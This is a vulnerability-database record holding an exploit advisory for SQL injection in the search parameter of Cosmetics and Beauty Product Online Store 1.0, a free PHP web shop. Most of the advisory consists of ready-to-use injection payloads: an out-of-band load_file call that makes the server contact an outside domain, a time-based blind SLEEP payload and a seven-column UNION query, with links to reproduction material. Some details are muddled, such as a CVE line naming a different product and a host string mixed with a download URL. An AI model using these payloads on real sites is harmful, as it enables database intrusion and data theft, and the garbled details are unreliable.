{"id": "PACKETSTORM:166049", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Cosmetics And Beauty Product Online Store 1.0 SQL Injection", "description": "", "published": "2022-02-18T00:00:00", "modified": "2022-02-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166049/Cosmetics-And-Beauty-Product-Online-Store-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-02-18T16:52:42", "viewCount": 44, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "vulnersScore": 0.4}, "_state": {"dependencies": 1646409666}, "_internal": {}, "sourceHref": "https://packetstormsecurity.com/files/download/166049/cbpos10-sql.txt", "sourceData": "`## Title: Cosmetics-and-Beauty-Product-Online-Store v1.0 remote SQL-Injections \n## Author: nu11secur1ty \n## Date: 02.18.2022 \n## Vendor: https://www.sourcecodester.com/users/tips23 \n## Software: https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html \n## CVE-Medical Store Management System v1.0 \n \n \n## Description: \nThe search parameter on Cosmetics-and-Beauty-Product-Online-Store v1.0 \nappears to be vulnerable to SQL injection attacks. \nThe payload '+(select \nload_file('\\\\\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html\\\\vcu'))+' \nwas submitted in the search parameter. \nThis payload injects a SQL sub-query that calls MySQL's load_file \nfunction with a UNC file path that references a URL on an external \ndomain. \nThe application interacted with that domain, indicating that the \ninjected SQL query was executed. \nWARNING: If this is in some external domain, or some subdomain, or \ninternal, this will be extremely dangerous! 
\nStatus: CRITICAL \n \n \n[+] Payloads: \n \n```mysql \n--- \nParameter: search (GET) \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: p=products&search=k98fv1dx2487vpqrspg6nz8jvaogfx6pz6pv'+(select \nload_file('\\\\\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.htmls\\\\vcu'))+'') \nAND (SELECT 8319 FROM (SELECT(SLEEP(3)))tZAp) AND ('YVjM'='YVjM \n \nType: UNION query \nTitle: Generic UNION query (NULL) - 7 columns \nPayload: p=products&search=k98fv1dx2487vpqrspg6nz8jvaogfx6pz6pv'+(select \nload_file('\\\\\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.htmls\\\\vcu'))+'') \nUNION ALL SELECT \n47,47,47,CONCAT(0x717a6b7171,0x5371436d48496454644b78506c746c637876537176426748654f4644545544616b50674e41505442,0x7170787671),47,47,47,47,47,47-- \n- \n--- \n \n``` \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Cosmetics-and-Beauty-Product-Online-Store/SQL-Injection) \n \n## Proof and Exploit: \n[href](https://streamable.com/9b2avg) \n \n \n-- \nSystem Administrator - Infrastructure Engineer \nPenetration Testing Engineer \nExploit developer at https://packetstormsecurity.com/ \nhttps://cve.mitre.org/index.html and https://www.exploit-db.com/ \nhome page: https://www.nu11secur1ty.com/ \nhiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= \nnu11secur1ty <http://nu11secur1ty.com/> \n`\n"}